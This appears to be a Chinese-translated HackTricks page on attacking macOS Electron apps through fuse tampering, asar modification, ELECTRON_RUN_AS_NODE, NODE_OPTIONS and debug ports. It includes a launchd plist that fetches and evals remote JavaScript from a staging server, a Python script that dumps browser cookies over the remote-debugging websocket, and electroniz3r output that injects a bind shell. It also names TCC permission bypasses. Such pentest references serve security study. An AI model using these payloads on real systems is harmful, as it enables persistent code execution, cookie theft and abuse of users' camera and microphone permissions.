hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md

16 KiB
Raw Blame History

macOS Electron 应用程序注入

从零开始学习 AWS 黑客技术,成为专家 htARTEHackTricks AWS 红队专家)

支持 HackTricks 的其他方式:

基本信息

如果您不知道 Electron 是什么,您可以在这里找到大量信息。但现在只需知道 Electron 运行 node
而 node 具有一些参数环境变量,可以用来使其执行其他代码,而不仅仅是指定的文件。

Electron 保险丝

接下来将讨论这些技术,但近年来 Electron 已添加了几个安全标志以防止它们。这些是Electron 保险丝,这些是用于防止 macOS 中的 Electron 应用程序加载任意代码的标志:

  • RunAsNode:如果禁用,将阻止使用环境变量 ELECTRON_RUN_AS_NODE 注入代码。
  • EnableNodeCliInspectArguments:如果禁用,像 --inspect--inspect-brk 这样的参数将不被尊重。避免以这种方式注入代码。
  • EnableEmbeddedAsarIntegrityValidation如果启用macOS 将验证加载的 asar 文件。通过这种方式防止通过修改此文件的内容进行代码注入
  • OnlyLoadAppFromAsar:如果启用,将仅检查和使用 app.asar而不是按照以下顺序搜索加载app.asarapp,最后是**default_app.asar。因此,当与embeddedAsarIntegrityValidation**保险丝结合使用时,不可能加载未经验证的代码。
  • LoadBrowserProcessSpecificV8Snapshot:如果启用,浏览器进程将使用名为 browser_v8_context_snapshot.bin 的文件作为其 V8 快照。

另一个不会阻止代码注入的有趣保险丝是:

  • EnableCookieEncryption:如果启用,磁盘上的 cookie 存储将使用操作系统级加密密钥进行加密。

检查 Electron 保险丝

您可以从应用程序中检查这些标志

npx @electron/fuses read --app /Applications/Slack.app

Analyzing app: Slack.app
Fuse Version: v1
RunAsNode is Disabled
EnableCookieEncryption is Enabled
EnableNodeOptionsEnvironmentVariable is Disabled
EnableNodeCliInspectArguments is Disabled
EnableEmbeddedAsarIntegrityValidation is Enabled
OnlyLoadAppFromAsar is Enabled
LoadBrowserProcessSpecificV8Snapshot is Disabled

修改 Electron 保险丝

正如文档提到的Electron 保险丝的配置是在Electron 二进制文件中配置的,其中包含字符串**dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX**。

在 macOS 应用程序中,通常位于 application.app/Contents/Frameworks/Electron Framework.framework/Electron Framework

grep -R "dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX" Slack.app/
Binary file Slack.app//Contents/Frameworks/Electron Framework.framework/Versions/A/Electron Framework matches

您可以在https://hexed.it/中加载此文件并搜索前述字符串。在此字符串之后您可以在ASCII中看到一个数字“0”或“1”指示每个保险丝是禁用还是启用。只需修改十六进制代码0x3000x311)以修改保险丝值

请注意,如果您尝试覆盖应用程序中的**Electron Framework二进制文件**,并修改这些字节,该应用程序将无法运行。

RCE向Electron应用程序添加代码

可能存在Electron应用程序正在使用的外部JS/HTML文件,因此攻击者可以在这些文件中注入代码,其签名不会被检查,并在应用程序的上下文中执行任意代码。

{% hint style="danger" %} 但是,目前存在两个限制:

  • 需要**kTCCServiceSystemPolicyAppBundles**权限来修改应用程序,因此默认情况下不再可能。
  • 编译的**asap文件通常具有保险丝embeddedAsarIntegrityValidationonlyLoadAppFromAsar**已启用

使得这种攻击路径更加复杂(或不可能)。 {% endhint %}

请注意,可以通过将应用程序复制到另一个目录(如**/tmp),将文件夹app.app/Contents重命名为app.app/NotCon修改带有您恶意代码的asar文件,将其重新命名为app.app/Contents并执行它来绕过kTCCServiceSystemPolicyAppBundles**的要求。

您可以使用以下命令从asar文件中解压缩代码

npx asar extract app.asar app-decomp

并在修改后重新打包:

npx asar pack app-decomp app-new.asar

使用 ELECTRON_RUN_AS_NODE 进行 RCE

根据文档,如果设置了这个环境变量,它将以普通的 Node.js 进程启动该进程。

{% code overflow="wrap" %}

# Run this
ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
# Then from the nodeJS console execute:
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')

{% endcode %}

{% hint style="danger" %} 如果禁用了fuse RunAsNode,环境变量 ELECTRON_RUN_AS_NODE 将被忽略,这将无法工作。 {% endhint %}

从应用程序 Plist 进行注入

正如在这里提出的,您可以滥用这个环境变量在 plist 中保持持久性:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>EnvironmentVariables</key>
<dict>
<key>ELECTRON_RUN_AS_NODE</key>
<string>true</string>
</dict>
<key>Label</key>
<string>com.xpnsec.hideme</string>
<key>ProgramArguments</key>
<array>
<string>/Applications/Slack.app/Contents/MacOS/Slack</string>
<string>-e</string>
<string>const { spawn } = require("child_process"); spawn("osascript", ["-l","JavaScript","-e","eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding( $.NSData.dataWithContentsOfURL( $.NSURL.URLWithString('http://stagingserver/apfell.js')), $.NSUTF8StringEncoding)));"]);</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>

使用 NODE_OPTIONS 进行远程代码执行

您可以将恶意载荷存储在不同的文件中并执行它:

# Content of /tmp/payload.js
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator');

# Execute
NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord

{% endcode %}

{% hint style="danger" %} 如果 EnableNodeOptionsEnvironmentVariable 保持 禁用,应用程序在启动时将 忽略 环境变量 NODE_OPTIONS,除非设置了环境变量 ELECTRON_RUN_AS_NODE,如果 RunAsNode 保持禁用,那么设置了 ELECTRON_RUN_AS_NODE 也将被 忽略

如果不设置 ELECTRON_RUN_AS_NODE,你将会遇到以下 错误Most NODE_OPTIONs are not supported in packaged apps. See documentation for more details. {% endhint %}

从应用程序 Plist 注入

您可以在 plist 中滥用这个环境变量以保持持久性,添加以下键:

<dict>
<key>EnvironmentVariables</key>
<dict>
<key>ELECTRON_RUN_AS_NODE</key>
<string>true</string>
<key>NODE_OPTIONS</key>
<string>--require /tmp/payload.js</string>
</dict>
<key>Label</key>
<string>com.hacktricks.hideme</string>
<key>RunAtLoad</key>
<true/>
</dict>

利用检查进行RCE

根据这里,如果你使用诸如**--inspect--inspect-brk--remote-debugging-port等标志来执行Electron应用程序将会打开一个调试端口**这样你就可以连接到它例如从Chrome中的chrome://inspect),然后你就可以在其中注入代码甚至启动新进程。
例如:

/Applications/Signal.app/Contents/MacOS/Signal --inspect=9229
# Connect to it using chrome://inspect and execute a calculator with:
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')

{% endcode %}

{% hint style="danger" %} 如果禁用了熔丝 EnableNodeCliInspectArguments,则应用程序在启动时会忽略节点参数(如 --inspect),除非设置了环境变量 ELECTRON_RUN_AS_NODE,但如果禁用了熔丝 RunAsNode,则该环境变量也会被忽略

但是,您仍然可以使用 electron 参数 --remote-debugging-port=9229,但之前的有效载荷将无法执行其他进程。 {% endhint %}

使用参数 --remote-debugging-port=9222 可以从 Electron 应用程序中窃取一些信息,如历史记录(使用 GET 命令)或浏览器中的cookies(因为它们在浏览器内部被解密,并且有一个json端点会提供它们)。

您可以在这里这里了解如何操作,并使用自动工具 WhiteChocolateMacademiaNut 或类似的简单脚本:

import websocket
ws = websocket.WebSocket()
ws.connect("ws://localhost:9222/devtools/page/85976D59050BFEFDBA48204E3D865D00", suppress_origin=True)
ws.send('{\"id\": 1, \"method\": \"Network.getAllCookies\"}')
print(ws.recv()

这篇博文利用这种调试方法使一个无头Chrome在任意位置下载任意文件

从App Plist注入

您可以在plist中滥用这个环境变量以保持持久性添加这些键

<dict>
<key>ProgramArguments</key>
<array>
<string>/Applications/Slack.app/Contents/MacOS/Slack</string>
<string>--inspect</string>
</array>
<key>Label</key>
<string>com.hacktricks.hideme</string>
<key>RunAtLoad</key>
<true/>
</dict>

滥用旧版本的 TCC Bypass

{% hint style="success" %} macOS 的 TCC 守护程序不会检查应用程序的执行版本。因此,如果您无法使用任何先前的技术在 Electron 应用程序中注入代码,您可以下载应用程序的旧版本并在其中注入代码,因为它仍将获得 TCC 权限(除非信任缓存阻止)。 {% endhint %}

运行非 JS 代码

先前的技术将允许您在 Electron 应用程序的进程中运行 JS 代码。但是,请记住,子进程在与父应用程序相同的沙盒配置文件下运行,并且继承它们的 TCC 权限
因此,如果您想滥用权限以访问摄像头或麦克风,您可以从进程中运行另一个二进制文件

自动注入

工具 electroniz3r 可轻松用于查找已安装的易受攻击的 Electron 应用程序并在其中注入代码。此工具将尝试使用**--inspect**技术:

您需要自行编译它,并可以像这样使用它:

# Find electron apps
./electroniz3r list-apps

╔══════════════════════════════════════════════════════════════════════════════════════════════════════╗
║    Bundle identifier                      │       Path                                               ║
╚──────────────────────────────────────────────────────────────────────────────────────────────────────╝
com.microsoft.VSCode                         /Applications/Visual Studio Code.app
org.whispersystems.signal-desktop            /Applications/Signal.app
org.openvpn.client.app                       /Applications/OpenVPN Connect/OpenVPN Connect.app
com.neo4j.neo4j-desktop                      /Applications/Neo4j Desktop.app
com.electron.dockerdesktop                   /Applications/Docker.app/Contents/MacOS/Docker Desktop.app
org.openvpn.client.app                       /Applications/OpenVPN Connect/OpenVPN Connect.app
com.github.GitHubClient                      /Applications/GitHub Desktop.app
com.ledger.live                              /Applications/Ledger Live.app
com.postmanlabs.mac                          /Applications/Postman.app
com.tinyspeck.slackmacgap                    /Applications/Slack.app
com.hnc.Discord                              /Applications/Discord.app

# Check if an app has vulenrable fuses vulenrable
## It will check it by launching the app with the param "--inspect" and checking if the port opens
/electroniz3r verify "/Applications/Discord.app"

/Applications/Discord.app started the debug WebSocket server
The application is vulnerable!
You can now kill the app using `kill -9 57739`

# Get a shell inside discord
## For more precompiled-scripts check the code
./electroniz3r inject "/Applications/Discord.app" --predefined-script bindShell

/Applications/Discord.app started the debug WebSocket server
The webSocketDebuggerUrl is: ws://127.0.0.1:13337/8e0410f0-00e8-4e0e-92e4-58984daf37e5
Shell binding requested. Check `nc 127.0.0.1 12345`

参考资料

从零开始学习 AWS 黑客技术,成为专家 htARTEHackTricks AWS 红队专家)

支持 HackTricks 的其他方式: